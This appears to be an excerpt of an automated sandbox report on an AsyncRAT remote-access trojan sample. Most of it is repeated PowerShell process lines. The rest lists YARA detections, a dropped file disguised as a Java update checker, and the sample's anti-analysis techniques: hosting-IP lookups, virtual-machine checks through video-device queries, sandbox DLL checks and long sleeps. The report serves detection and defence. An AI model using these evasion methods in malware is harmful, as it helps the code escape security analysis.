                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\svchost.comProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: x.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Check if machine is in data center or colocation facility
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              Source: x.exe, 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                              Source: x.exeBinary or memory string: SBIEDLL.DLLINFO
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeMemory allocated: 1610000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeMemory allocated: 1B000000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWindow / User API: threadDelayed 731Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeWindow / User API: threadDelayed 9039Jump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2715
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3568
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3965
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6259
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 851
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
